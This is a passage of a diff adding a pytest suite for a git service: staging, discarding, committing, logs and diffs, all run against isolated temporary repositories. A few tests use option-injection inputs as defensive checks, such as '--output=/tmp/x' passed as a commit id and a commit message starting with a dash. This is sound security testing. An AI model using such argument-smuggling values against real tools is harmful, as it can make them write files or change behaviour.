+restrict ``diff-tree`` to the first parent; ``check-ref-format`` accepts
+``refs/heads/-x``; ``git commit`` says "nothing added to commit" on stdout),
+and a fake would have hidden all three.
+
+The developer's own git is kept out of it, in both directions:
+``GIT_CONFIG_GLOBAL`` points at a file in ``tmp_path``,
+``GIT_CONFIG_NOSYSTEM`` turns off ``/etc/gitconfig``, and the identity comes
+from ``GIT_AUTHOR_*`` / ``GIT_COMMITTER_*``. So no test can read the
+machine's user.name, no test can write it, and the same test passes on a
+laptop whose git is configured for a different person. Nothing here touches
+a network or ``settings.PROJECT_DIR``: the service takes its project
+directory as an injected callable.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import shutil
+import subprocess
+import threading
+from pathlib import Path
+
+import pytest
+
+from app.core.git import diff as diff_ops
+from app.core.git import log as log_ops
+from app.core.git import repo as repo_ops
+from app.core.git import runner
+from app.core.git.errors import GitBusy, GitError
+from app.core.git.service import (
+    GitService,
+    changed_paths,
+    check_ref_format,
+    commit_changes,
+    discard_paths,
+    resolve_repo,
+    stage_paths,
+    unstage_paths,
+)
+
+pytestmark = pytest.mark.skipif(shutil.which("git") is None,
+                                reason="the host has no git")
+
+#: A fixed author date, so a log assertion is about the log and not about
+#: what time the test ran.
+_WHEN = "1700000000 +0000"
+
+
+@pytest.fixture(autouse=True)
+def isolated_git(tmp_path, monkeypatch):
+    """The machine's own git config is neither read nor written.
+
+    ``GIT_CONFIG_GLOBAL`` is a file inside ``tmp_path`` (named
+    ``.gitconfig``, because the scope the identity read reports is derived
+    from the filename), ``GIT_CONFIG_NOSYSTEM`` removes the system file, and
+    the identity comes from the environment -- so a commit works here on a
+    machine where git has never been configured, and the identity tests can
+    unset it deliberately.
+
+    ``git_env`` passes these through because it starts from the process
+    environment; the test below pins that, since everything else here
+    depends on it.
+    """
+    config = tmp_path / "githome" / ".gitconfig"
+    config.parent.mkdir(parents=True, exist_ok=True)
+    config.write_text("[init]\n\tdefaultBranch = main\n", encoding="utf-8")
+    monkeypatch.setenv("GIT_CONFIG_GLOBAL", str(config))
+    monkeypatch.setenv("GIT_CONFIG_NOSYSTEM", "1")
+    monkeypatch.setenv("GIT_AUTHOR_NAME", "Test Author")
+    monkeypatch.setenv("GIT_AUTHOR_EMAIL", "author@example.com")
+    monkeypatch.setenv("GIT_COMMITTER_NAME", "Test Author")
+    monkeypatch.setenv("GIT_COMMITTER_EMAIL", "author@example.com")
+    monkeypatch.setenv("GIT_AUTHOR_DATE", _WHEN)
+    monkeypatch.setenv("GIT_COMMITTER_DATE", _WHEN)
+    # The runner's caches (where git is, what version, is core.sshCommand
+    # set) are process-wide and would otherwise carry another test file's
+    # fakes into these real calls.
+    runner._reset_for_tests()
+    yield config
+    runner._reset_for_tests()
+
+
+class Repo:
+    """A real repository, with the two-line helpers every test needs."""
+
+    def __init__(self, root: Path):
+        self.root = root
+
+    # -- driving git directly, for the ARRANGE half of a test ------------
+
+    def git(self, *args: str) -> str:
+        """Run git in this repository. Fails the test if git does.
+
+        Deliberately NOT the service: a test that built its fixture with the
+        code under test would pass when both halves are wrong the same way.
+        """
+        proc = subprocess.run(["git", "-C", str(self.root), *args],
+                              capture_output=True)
+        assert proc.returncode == 0, (
+            f"git {' '.join(args)} failed: {proc.stderr.decode(errors='replace')}")
+        return proc.stdout.decode("utf-8", errors="replace")
+
+    def write(self, rel: str, text: str = "one\n") -> Path:
+        path = self.root / rel
+        path.parent.mkdir(parents=True, exist_ok=True)
+        path.write_bytes(text.encode("utf-8"))
+        return path
+
+    def write_bytes(self, rel: str, data: bytes) -> Path:
+        path = self.root / rel
+        path.parent.mkdir(parents=True, exist_ok=True)
+        path.write_bytes(data)
+        return path
+
+    def read(self, rel: str) -> str:
+        return (self.root / rel).read_text(encoding="utf-8")
+
+    def commit(self, message: str = "a commit",
+               files: dict[str, str] | None = None) -> str:
+        """Write *files*, stage everything, commit; returns the new sha."""
+        for rel, text in (files or {}).items():
+            self.write(rel, text)
+        self.git("add", "-A", "--", ".")
+        self.git("commit", "-q", "-m", message)
+        return self.head()
+
+    def head(self) -> str:
+        return self.git("rev-parse", "HEAD").strip()
+
+    @property
+    def service(self) -> GitService:
+        """A service pointed at this repository -- no settings involved."""
+        return GitService(project_dir=lambda: self.root)
+
+
+@pytest.fixture
+def make_repo(tmp_path):
+    """Factory: an initialised repository, optionally with a first commit."""
+
+    def _make(name: str = "project", *, first_commit: bool = True) -> Repo:
+        root = tmp_path / name
+        root.mkdir(parents=True, exist_ok=True)
+        repo = Repo(root)
+        repo.git("init", "-q")
+        repo_ops.ensure_scaffold(root)
+        if first_commit:
+            repo.commit("first", {"a.txt": "one\ntwo\n"})
+        return repo
+
+    return _make
+
+
+@pytest.fixture
+def repo(make_repo) -> Repo:
+    """A repository with the project scaffold and one commit."""
+    return make_repo()
+
+
+def _error(exc: pytest.ExceptionInfo[GitError]) -> GitError:
+    return exc.value
+
+
+# --- the environment the rest of this file rests on -------------------------
+
+
+def test_the_isolated_config_reaches_git(repo, isolated_git):
+    """``git_env`` keeps ``GIT_CONFIG_GLOBAL`` and the identity variables.
+
+    It starts from the process environment, which is what makes the whole
+    fixture above work; if that ever changed, every test here would quietly
+    start reading the developer's own ``.gitconfig``.
+    """
+    env = runner.git_env()
+
+    assert env["GIT_CONFIG_GLOBAL"] == str(isolated_git)
+    assert env["GIT_CONFIG_NOSYSTEM"] == "1"
+    assert env["GIT_AUTHOR_NAME"] == "Test Author"
+
+
+# --- which repository -------------------------------------------------------
+
+
+async def test_no_project_directory_is_a_state_not_an_error():
+    """"Nothing is open" is a screen the tab draws, not a failure."""
+    info = await GitService(project_dir=lambda: None).repo_info()
+
+    assert info.state == "no_project"
+    assert info.project_dir is None
+
+
+async def test_a_missing_git_is_reported_with_the_project_still_named(
+        repo, monkeypatch):
+    from app.core.git import service as service_module
+    monkeypatch.setattr(service_module, "git_executable", lambda: None)
+
+    info = await repo.service.repo_info()
+
+    assert info.state == "git_missing"
+    assert info.project_dir == str(repo.root)
+
+
+async def test_a_git_older_than_restore_is_refused(repo, monkeypatch):
+    """``restore`` and ``switch`` arrived in 2.23; unstage and discard are
+    spelled with them, so an older git is a version number and not a tab."""
+    from app.core.git import service as service_module
+    monkeypatch.setattr(service_module, "git_version", lambda: (2, 22, 0))
+
+    info = await repo.service.repo_info()
+
+    assert info.state == "git_too_old"
+    assert info.git_version == "2.22.0"
+
+
+async def test_a_git_whose_version_cannot_be_read_is_not_trusted(
+        repo, monkeypatch):
+    """Something on PATH called git that will not say what it is."""
+    from app.core.git import service as service_module
+    monkeypatch.setattr(service_module, "git_version", lambda: None)
+
+    info = await repo.service.repo_info()
+
+    assert info.state == "git_too_old"
+    assert info.git_version is None
+
+
+async def test_a_directory_that_is_not_a_repository(tmp_path):
+    plain = tmp_path / "plain"
+    plain.mkdir()
+
+    info = await GitService(project_dir=lambda: plain).repo_info()
+
+    assert info.state == "not_repo"
+    assert info.nested_toplevel is None
+
+
+async def test_a_project_inside_another_repository_is_never_operated_on(
+        make_repo, tmp_path):
+    """The one failure that would look like it worked.
+
+    A project directory inside the CodefyUI checkout (or a home directory
+    somebody ran ``git init`` in) resolves to THAT repository's top level,
+    and every stage, discard and commit would be applied there.
+    """
+    outer = make_repo("outer")
+    inner = outer.root / "nested" / "project"
+    inner.mkdir(parents=True)
+
+    info = await GitService(project_dir=lambda: inner).repo_info()
+
+    assert info.state == "not_repo"
+    assert Path(info.nested_toplevel).resolve() == outer.root.resolve()
+
+
+async def test_a_ready_repository_reports_its_git(repo):
+    info = await repo.service.repo_info()
+
+    assert info.state == "ready"
+    assert info.project_dir == str(repo.root)
+    assert info.git_version and info.git_version[0].isdigit()
+
+
+async def test_status_is_none_until_there_is_a_repository(tmp_path):
+    """``GET /api/git/status`` answers 200 with a state, always."""
+    plain = tmp_path / "plain"
+    plain.mkdir()
+
+    response = await GitService(project_dir=lambda: plain).status()
+
+    assert response.repo.state == "not_repo"
+    assert response.status is None
+
+
+async def test_status_reads_every_group(repo):
+    repo.write("a.txt", "one\nedited\n")
+    repo.write("new.txt", "new\n")
+    repo.git("add", "-A", "--", "new.txt")
+
+    response = await repo.service.status()
+
+    assert response.repo.state == "ready"
+    status = response.status
+    assert status.branch == "main"
+    assert [entry.path for entry in status.staged] == ["new.txt"]
+    assert [entry.path for entry in status.unstaged] == ["a.txt"]
+    assert status.untracked == []
+    assert not status.merge_in_progress and not status.rebase_in_progress
+
+
+async def test_a_half_finished_merge_is_visible_in_the_status(repo):
+    """Porcelain v2 does not mention it; ``rev-parse --git-path`` does.
+
+    The tab disables half its buttons on this flag, so it has to be true
+    exactly when ``.git/MERGE_HEAD`` exists.
+    """
+    repo.git("checkout", "-q", "-b", "side")
+    repo.commit("side", {"a.txt": "side\n"})
+    repo.git("checkout", "-q", "main")
+    repo.commit("main", {"a.txt": "main\n"})
+    conflicted = subprocess.run(
+        ["git", "-C", str(repo.root), "merge", "--no-ff", "-m", "merge",
+         "side"], capture_output=True)
+    assert conflicted.returncode != 0, "the fixture was meant to conflict"
+
+    status = (await repo.service.status()).status
+
+    assert status.merge_in_progress is True
+    assert [entry.path for entry in status.conflicted] == ["a.txt"]
+
+
+async def test_an_operation_on_a_non_repository_fails_with_its_state(tmp_path):
+    plain = tmp_path / "plain"
+    plain.mkdir()
+
+    with pytest.raises(GitError) as excinfo:
+        await GitService(project_dir=lambda: plain).stage(all_paths=True)
+
+    assert _error(excinfo).code == "not_repo"
+    assert _error(excinfo).status == 409
+
+
+async def test_an_operation_without_a_project_says_so():
+    with pytest.raises(GitError) as excinfo:
+        await GitService(project_dir=lambda: None).stage(all_paths=True)
+
+    assert _error(excinfo).code == "no_project"
+
+
+@pytest.mark.parametrize("attribute,value,code,status", [
+    pytest.param("git_executable", lambda: None, "git_missing", 503,
+                 id="no-git"),
+    pytest.param("git_version", lambda: (2, 22, 0), "git_too_old", 409,
+                 id="git-too-old"),
+])
+async def test_an_operation_on_an_unusable_git_fails_with_its_status(
+        repo, monkeypatch, attribute, value, code, status):
+    """The states that are a screen for ``GET /status`` are an ERROR for
+    every other route, and each carries its own HTTP status: a missing git
+    is a 503 (the server is not equipped), a git too old is a 409."""
+    from app.core.git import service as service_module
+    monkeypatch.setattr(service_module, attribute, value)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.stage(all_paths=True)
+
+    assert _error(excinfo).code == code
+    assert _error(excinfo).status == status
+    assert _error(excinfo).hint
+
+
+# --- init and the scaffold --------------------------------------------------
+
+
+async def test_init_makes_a_repository_and_hides_the_secrets(tmp_path):
+    """The button on the empty-state screen. Both files, and a real repo."""
+    root = tmp_path / "fresh"
+    root.mkdir()
+    service = GitService(project_dir=lambda: root)
+
+    result = await service.init()
+
+    assert (root / ".git").exists()
+    assert ".env" in (root / ".gitignore").read_text(encoding="utf-8").split()
+    assert "*.json text eol=lf" in (root / ".gitattributes").read_text(
+        encoding="utf-8")
+    # A mutation always answers with a real status -- here, of a repository
+    # that did not exist a moment ago.
+    assert result.status.unborn is True
+    assert set(result.detail["scaffold"]) == {".gitignore", ".gitattributes"}
+    assert (await service.repo_info()).state == "ready"
+
+
+async def test_init_appends_env_to_an_existing_gitignore(tmp_path):
+    """Never rewrite the user's file; add the one line that matters.
+
+    The append starts with a newline so a file whose last line has no
+    terminator does not gain ``*.pyco.env``.
+    """
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitignore").write_bytes(b"*.pyc")
+
+    await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitignore").read_bytes() == b"*.pyc\n.env\n"
+
+
+async def test_init_leaves_a_gitignore_that_already_hides_env_alone(tmp_path):
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitignore").write_bytes(b"# mine\n.env\n*.log\n")
+
+    await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitignore").read_bytes() == b"# mine\n.env\n*.log\n"
+
+
+async def test_init_never_rewrites_an_existing_gitattributes(tmp_path):
+    """Its rules decide how git stores every file; ours are a default, not
+    a correction."""
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitattributes").write_bytes(b"* -text\n")
+
+    await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitattributes").read_bytes() == b"* -text\n"
+
+
+async def test_init_works_inside_another_repository(make_repo):
+    """The nested case is exactly what init is FOR."""
+    outer = make_repo("outer")
+    inner = outer.root / "project"
+    inner.mkdir()
+    service = GitService(project_dir=lambda: inner)
+
+    await service.init()
+
+    info = await service.repo_info()
+    assert info.state == "ready"
+    assert info.nested_toplevel is None
+
+
+async def test_init_on_a_missing_directory_is_a_404(tmp_path):
+    service = GitService(project_dir=lambda: tmp_path / "not-there")
+
+    with pytest.raises(GitError) as excinfo:
+        await service.init()
+
+    assert _error(excinfo).code in ("not_found", "not_repo")
+
+
+# --- stage / unstage --------------------------------------------------------
+
+
+async def test_stage_names_the_files_it_moved(repo):
+    repo.write("a.txt", "one\nedited\n")
+    repo.write("new.txt", "new\n")
+
+    result = await repo.service.stage(["a.txt"])
+
+    assert [entry.path for entry in result.status.staged] == ["a.txt"]
+    assert result.changed_paths == ["a.txt"]
+    assert [entry.path for entry in result.status.untracked] == ["new.txt"]
+
+
+async def test_stage_all_takes_the_whole_tree(repo):
+    repo.write("a.txt", "one\nedited\n")
+    repo.write("dir/new.txt", "new\n")
+
+    result = await repo.service.stage(all_paths=True)
+
+    assert sorted(entry.path for entry in result.status.staged) == [
+        "a.txt", "dir/new.txt"]
+    assert result.status.unstaged == []
+
+
+async def test_stage_includes_a_deletion(repo):
+    """"Stage this file" has to mean staging its removal too; plain ``add``
+    would skip it and the commit would silently keep the file."""
+    (repo.root / "a.txt").unlink()
+
+    result = await repo.service.stage(["a.txt"])
+
+    assert [entry.kind for entry in result.status.staged] == ["deleted"]
+
+
+async def test_an_empty_selection_is_never_the_whole_tree(repo):
+    """``git add -A --`` with no pathspec stages EVERYTHING. A UI bug that
+    sent an empty selection must not be promoted into that."""
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.stage([])
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+async def test_unstage_puts_a_file_back_in_the_unstaged_group(repo):
+    repo.write("a.txt", "one\nedited\n")
+    repo.git("add", "-A", "--", "a.txt")
+
+    result = await repo.service.unstage(["a.txt"])
+
+    assert result.status.staged == []
+    assert [entry.path for entry in result.status.unstaged] == ["a.txt"]
+    assert repo.read("a.txt") == "one\nedited\n"
+
+
+async def test_unstage_of_an_mm_file_keeps_the_worktree_edit(repo):
+    """``MM``: staged AND modified again. Unstaging is about the index, and
+    the newer edit on disk is not ours to throw away."""
+    repo.write("a.txt", "staged\n")
+    repo.git("add", "-A", "--", "a.txt")
+    repo.write("a.txt", "worktree\n")
+
+    result = await repo.service.unstage(["a.txt"])
+
+    assert result.status.staged == []
+    assert [entry.xy for entry in result.status.unstaged] == [".M"]
+    assert repo.read("a.txt") == "worktree\n"
+
+
+async def test_unstage_all_empties_the_index(repo):
+    repo.write("a.txt", "one\nedited\n")
+    repo.write("new.txt", "new\n")
+    repo.git("add", "-A", "--", ".")
+
+    result = await repo.service.unstage(all_paths=True)
+
+    assert result.status.staged == []
+    assert [entry.path for entry in result.status.unstaged] == ["a.txt"]
+    assert [entry.path for entry in result.status.untracked] == ["new.txt"]
+
+
+async def test_unstage_on_an_unborn_branch_uses_rm_cached(make_repo):
+    """There is no HEAD to restore from yet, so ``restore --staged`` and
+    ``reset`` both fail; ``rm --cached`` is the spelling that works."""
+    repo = make_repo(first_commit=False)
+    repo.write("x.txt", "x\n")
+    repo.git("add", "-A", "--", ".")
+
+    result = await repo.service.unstage(all_paths=True)
+
+    assert result.status.unborn is True
+    assert result.status.staged == []
+    assert sorted(entry.path for entry in result.status.untracked) == [
+        ".gitattributes", ".gitignore", "x.txt"]
+    assert (repo.root / "x.txt").exists()
+
+
+async def test_unstage_one_path_on_an_unborn_branch(make_repo):
+    repo = make_repo(first_commit=False)
+    repo.write("x.txt", "x\n")
+    repo.write("y.txt", "y\n")
+    repo.git("add", "-A", "--", ".")
+
+    result = await repo.service.unstage(["x.txt"])
+
+    assert "y.txt" in [entry.path for entry in result.status.staged]
+    assert "x.txt" in [entry.path for entry in result.status.untracked]
+
+
+# --- discard ----------------------------------------------------------------
+
+
+async def test_discard_restores_a_tracked_file(repo):
+    repo.write("a.txt", "ruined\n")
+
+    result = await repo.service.discard(["a.txt"])
+
+    assert repo.read("a.txt") == "one\ntwo\n"
+    assert result.status.unstaged == []
+    assert result.changed_paths == ["a.txt"]
+
+
+async def test_discard_deletes_an_untracked_file(repo):
+    """The only thing "discard" can mean for a file with no other copy."""
+    repo.write("scratch.txt", "temporary\n")
+
+    result = await repo.service.discard(["scratch.txt"])
+
+    assert not (repo.root / "scratch.txt").exists()
+    assert result.status.untracked == []
+
+
+async def test_discard_of_an_mm_file_keeps_what_was_staged(repo):
+    """VS Code's rule, and the recoverable one: the index is untouched, so
+    the version the user deliberately staged survives."""
+    repo.write("a.txt", "staged\n")
+    repo.git("add", "-A", "--", "a.txt")
+    repo.write("a.txt", "worktree\n")
+
+    result = await repo.service.discard(["a.txt"])
+
+    assert repo.read("a.txt") == "staged\n"
+    assert [entry.xy for entry in result.status.staged] == ["M."]
+
+
+async def test_discard_of_a_path_with_nothing_to_discard_is_a_400(repo):
+    """Either it is already clean or the status the request was built from
+    is stale; both are answered by asking again, not by deleting something."""
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.discard(["a.txt"])
+
+    assert _error(excinfo).code == "path_not_in_status"
+    assert _error(excinfo).status == 400
+
+
+async def test_discard_all_never_deletes_an_ignored_env(repo):
+    """``clean -fd``, never ``-x``. The ignored files are the user's API
+    keys, their virtualenv and their model weights."""
+    repo.write(".env", "OPENAI_API_KEY=sk-secret\n")
+    repo.write("a.txt", "ruined\n")
+    repo.write("scratch/new.txt", "temporary\n")
+
+    result = await repo.service.discard(all_paths=True)
+
+    assert (repo.root / ".env").read_text(encoding="utf-8") == (
+        "OPENAI_API_KEY=sk-secret\n")
+    assert repo.read("a.txt") == "one\ntwo\n"
+    assert not (repo.root / "scratch").exists()
+    assert result.status.unstaged == [] and result.status.untracked == []
+
+
+async def test_discard_refuses_a_submodule(repo):
+    """``restore --worktree`` on a gitlink succeeds and does nothing at all
+    (measured on git 2.53), so the tab would report a discard that did not
+    happen. The changes are in the other repository."""
+    sub = repo.root / "sub"
+    sub.mkdir()
+    inner = Repo(sub)
+    inner.git("init", "-q")
+    inner.commit("sub first", {"s.txt": "one\n"})
+    repo.git("update-index", "--add", "--cacheinfo",
+             f"160000,{inner.head()},sub")
+    repo.git("commit", "-q", "-m", "add the submodule")
+    inner.commit("sub second", {"s.txt": "two\n"})
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.discard(["sub"])
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "submodule" in (_error(excinfo).hint or "")
+
+
+async def test_changed_paths_covers_every_file_a_discard_touched(repo):
+    repo.write("a.txt", "ruined\n")
+    repo.write("scratch.txt", "temporary\n")
+
+    result = await repo.service.discard(["a.txt", "scratch.txt"])
+
+    assert result.changed_paths == ["a.txt", "scratch.txt"]
+    assert result.detail["restored"] == 1
+    assert result.detail["removed"] == 1
+
+
+# --- commit -----------------------------------------------------------------
+
+
+async def test_commit_reports_the_sha_it_made(repo):
+    repo.write("a.txt", "committed\n")
+    repo.git("add", "-A", "--", "a.txt")
+
+    result = await repo.service.commit("second commit")
+
+    assert result.detail["sha"] == repo.head()
+    assert result.detail["short"] == repo.head()[:7]
+    assert result.head == repo.head()
+    assert result.status.staged == []
+    assert result.changed_paths == ["a.txt"]
+
+
+async def test_commit_all_stages_first(repo):
+    repo.write("a.txt", "edited\n")
+    repo.write("new.txt", "new\n")
+
+    result = await repo.service.commit("everything", all_paths=True)
+
+    assert result.status.staged == [] and result.status.untracked == []
+    committed = log_ops.commit_files(repo.root, result.detail["sha"])
+    assert sorted(entry.path for entry in committed) == ["a.txt", "new.txt"]
+
+
+async def test_a_commit_message_travels_on_stdin(repo):
+    """It is the one value here meant to contain newlines, and an argument
+    that starts with ``-`` is an option."""
+    repo.write("a.txt", "edited\n")
+
+    await repo.service.commit("-not-an-option\n\nbody line\n", all_paths=True)
+
+    assert repo.git("log", "-1", "--format=%s").strip() == "-not-an-option"
+    assert repo.git("log", "-1", "--format=%b").strip() == "body line"
+
+
+async def test_amend_replaces_the_last_commit(repo):
+    first = repo.head()
+    repo.write("a.txt", "amended\n")
+
+    result = await repo.service.commit("a better message", all_paths=True,
+                                       amend=True)
+
+    assert result.detail["sha"] != first
+    assert repo.git("log", "-1", "--format=%s").strip() == "a better message"
+    assert repo.git("rev-list", "--count", "HEAD").strip() == "1"
+
+
+async def test_amend_without_a_commit_to_amend_is_a_404(make_repo):
+    """git says "You have nothing to amend", which no classification rule
+    should have to know: the status already says the branch is unborn."""
+    repo = make_repo(first_commit=False)
+    repo.write("x.txt", "x\n")
+    repo.git("add", "-A", "--", ".")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit("nothing yet", amend=True)
+
+    assert _error(excinfo).code == "not_found"
+    assert _error(excinfo).status == 404
+
+
+async def test_a_commit_with_nothing_staged_is_not_a_500(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit("nothing to say")
+
+    assert _error(excinfo).code == "nothing_to_commit"
+    assert _error(excinfo).status == 409
+
+
+async def test_a_commit_of_untracked_files_only_is_not_a_500(repo):
+    """git says this one on STDOUT ("nothing added to commit but untracked
+    files present"), which is why both streams are classified."""
+    repo.write("new.txt", "new\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit("only new files")
+
+    assert _error(excinfo).code == "nothing_to_commit"
+
+
+async def test_a_commit_without_an_identity_says_which_problem_it_is(
+        repo, isolated_git, monkeypatch):
+    """``user.useConfigOnly`` stops git guessing an identity from the
+    hostname, which is the only way this failure is the same on every
+    machine -- a host with a real domain would otherwise commit happily as
+    ``user@host``."""
+    for name in ("GIT_AUTHOR_NAME", "GIT_AUTHOR_EMAIL", "GIT_COMMITTER_NAME",
+                 "GIT_COMMITTER_EMAIL"):
+        monkeypatch.delenv(name, raising=False)
+    isolated_git.write_text("[user]\n\tuseConfigOnly = true\n",
+                            encoding="utf-8")
+    repo.write("a.txt", "edited\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit("who am i", all_paths=True)
+
+    assert _error(excinfo).code == "identity_missing"
+
+
+# --- log --------------------------------------------------------------------
+
+
+async def test_the_log_reads_every_field(repo):
+    repo.git("tag", "v1")
+
+    page = await repo.service.log(limit=5)
+
+    assert page.unborn is False and page.has_more is False
+    commit = page.commits[0]
+    assert commit.sha == repo.head()
+    assert commit.short == repo.head()[:7]
+    assert commit.parents == []
+    assert commit.author_name == "Test Author"
+    assert commit.author_email == "author@example.com"
+    assert commit.authored_at == 1700000000
+    assert set(commit.refs) == {"HEAD -> main", "tag: v1"}
+    assert commit.subject == "first"
+    assert commit.body == ""
+
+
+async def test_a_body_with_blank_lines_survives_the_format(repo):
+    """The message is the LAST field precisely so that anything in it lands
+    in the body, newlines included."""
+    repo.write("a.txt", "edited\n")
+    repo.git("add", "-A", "--", ".")
+    repo.git("commit", "-q", "-m", "subject", "-m", "first para\n\nsecond")
+
+    page = await repo.service.log(limit=1)
+
+    assert page.commits[0].subject == "subject"
+    assert page.commits[0].body == "first para\n\nsecond"
+
+
+async def test_the_log_pages(repo):
+    for index in range(4):
+        repo.commit(f"commit {index}", {"a.txt": f"{index}\n"})
+
+    first = await repo.service.log(limit=2)
+    last = await repo.service.log(skip=4, limit=2)
+
+    assert [commit.subject for commit in first.commits] == ["commit 3",
+                                                            "commit 2"]
+    assert first.has_more is True
+    assert [commit.subject for commit in last.commits] == ["first"]
+    assert last.has_more is False
+
+
+async def test_the_log_of_an_unborn_branch_is_empty_not_broken(make_repo):
+    page = await make_repo(first_commit=False).service.log(limit=5)
+
+    assert page.unborn is True
+    assert page.commits == [] and page.has_more is False
+
+
+async def test_a_limit_outside_the_range_is_refused(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.log(limit=1000)
+
+    assert _error(excinfo).code == "invalid_value"
+
+
+# --- the files in one commit ------------------------------------------------
+
+
+async def test_commit_files_of_a_root_commit_is_every_file_in_it(repo):
+    files = await repo.service.commit_files(repo.head())
+
+    assert sorted(entry.path for entry in files) == [
+        ".gitattributes", ".gitignore", "a.txt"]
+    assert {entry.kind for entry in files} == {"added"}
+    assert {entry.xy for entry in files} == {"A."}
+
+
+async def test_commit_files_of_a_merge_is_the_first_parent_diff(repo):
+    """The measured bug this is here for: ``diff-tree -m --first-parent``
+    prints one diff PER PARENT (git 2.53), so a merge appeared to have
+    changed every file that changed on either side of it."""
+    repo.git("checkout", "-q", "-b", "side")
+    repo.commit("on the side", {"side.txt": "side\n"})
+    repo.git("checkout", "-q", "main")
+    repo.commit("on main", {"main.txt": "main\n"})
+    repo.git("merge", "--no-ff", "-m", "merge side", "side")
+
+    files = await repo.service.commit_files(repo.head())
+
+    assert [entry.path for entry in files] == ["side.txt"]
+
+
+async def test_commit_files_reports_a_rename_with_where_it_came_from(repo):
+    repo.git("mv", "a.txt", "b.txt")
+    repo.git("commit", "-q", "-m", "renamed")
+
+    files = await repo.service.commit_files(repo.head())
+
+    assert [(entry.path, entry.orig_path, entry.kind) for entry in files] == [
+        ("b.txt", "a.txt", "renamed")]
+    assert files[0].score == 100
+
+
+async def test_commit_files_of_an_unknown_commit_is_a_404(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit_files("0" * 40)
+
+    assert _error(excinfo).code == "not_found"
+    assert _error(excinfo).status == 404
+
+
+async def test_a_commit_id_that_is_not_one_never_reaches_git(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit_files("--output=/tmp/x")
+
+    assert _error(excinfo).code == "invalid_ref"
+
+
+# --- diff -------------------------------------------------------------------
+
+
+async def test_the_worktree_diff_is_the_index_against_disk(repo):
+    repo.write("a.txt", "one\nchanged\n")
+
+    response = await repo.service.diff("a.txt", "worktree")
+
+    assert "-two" in response.patch and "+changed" in response.patch
+    assert (response.old_ref, response.new_ref) == ("index", "worktree")
+    assert response.binary is False and response.truncated is False
+
+
+async def test_the_index_diff_is_head_against_the_index(repo):
+    repo.write("a.txt", "one\nstaged\n")
+    repo.git("add", "-A", "--", "a.txt")
+
+    response = await repo.service.diff("a.txt", "index")
+
+    assert "+staged" in response.patch
+    assert (response.old_ref, response.new_ref) == ("HEAD", "index")
+
+
+async def test_an_untracked_file_is_diffed_against_nothing(repo):
+    """``git diff`` says nothing at all about an untracked file, and an
+    empty patch for a file the user can see is the worst possible answer."""
+    repo.write("new.txt", "brand new\n")
+
+    response = await repo.service.diff("new.txt", "worktree")
+
+    assert "+brand new" in response.patch
+    assert response.old_missing is True
+
+
+async def test_the_commit_diff_names_both_sides(repo):
+    second = repo.commit("second", {"a.txt": "one\nsecond\n"})
+
+    response = await repo.service.diff("a.txt", "commit", sha=second)
+
+    assert "+second" in response.patch
+    assert response.old_ref == f"{second}^"
+    assert response.new_ref == second
+
+
+async def test_the_diff_of_a_root_commit_has_no_old_side(repo):
+    response = await repo.service.diff("a.txt", "commit", sha=repo.head())
+
+    assert "+one" in response.patch
+    assert response.old_ref is None
+    assert response.old_missing is True
+
+
+async def test_a_binary_file_is_reported_rather_than_decoded(repo):
+    header = b"\x89PNG\r\n\x1a\n"
+    repo.write_bytes("logo.png", header + bytes(range(256)))
+    repo.git("add", "-A", "--", ".")
+    repo.git("commit", "-q", "-m", "a png")
+    repo.write_bytes("logo.png", header + bytes(range(256)) * 2)
+
+    response = await repo.service.diff("logo.png", "worktree")
+
+    assert response.binary is True
+    assert "Binary files" in response.patch
+
+
+async def test_a_text_file_that_mentions_binary_files_is_not_binary(repo):
+    """The marker is anchored to the start of a line; inside a hunk it
+    arrives with a ``+`` in front of it."""
+    repo.write("notes.md", "one\nBinary files a and b differ\n")
+
+    response = await repo.service.diff("notes.md", "worktree")
+
+    assert "+Binary files a and b differ" in response.patch
+    assert response.binary is False
+
+
+async def test_a_huge_patch_is_cut_at_the_cap(repo):
+    """A megabyte of diff is a generated file or a vendored tree, and the
+    tab says so instead of sending it."""
+    repo.write("big.txt", "".join(f"line {index:07d}\n" for index in range(90_000)))
+
+    response = await repo.service.diff("big.txt", "worktree")
+
+    assert response.truncated is True
+    assert len(response.patch.encode("utf-8")) <= diff_ops.MAX_PATCH_BYTES
+
+
+async def test_a_diff_can_carry_both_whole_sides(repo):
+    repo.write("a.txt", "one\nchanged\n")
+
+    response = await repo.service.diff("a.txt", "worktree", blobs=True)
+
+    assert response.old_text == "one\ntwo\n"
+    assert response.new_text == "one\nchanged\n"
+    assert response.old_missing is False and response.new_missing is False
+
+
+async def test_the_added_side_of_a_diff_is_missing_not_empty(repo):
+    """"This file was added here" is an answer, not a failure."""
+    second = repo.commit("added", {"new.txt": "new\n"})
+
+    response = await repo.service.diff("new.txt", "commit", sha=second,
+                                       blobs=True)
+
+    assert response.old_missing is True and response.old_text is None
+    assert response.new_text == "new\n"
+
+
+async def test_an_unknown_diff_scope_is_refused(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("a.txt", "everything")
+
+    assert _error(excinfo).code == "invalid_value"
+
+
+async def test_a_commit_diff_without_a_commit_is_refused(repo):
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("a.txt", "commit")
+
+    assert _error(excinfo).code == "invalid_value"
+
+
+# --- one file at one ref ----------------------------------------------------
+
+
+async def test_a_file_can_be_read_at_head_index_worktree_and_a_sha(repo):
+    first = repo.head()
+    repo.write("a.txt", "staged\n")
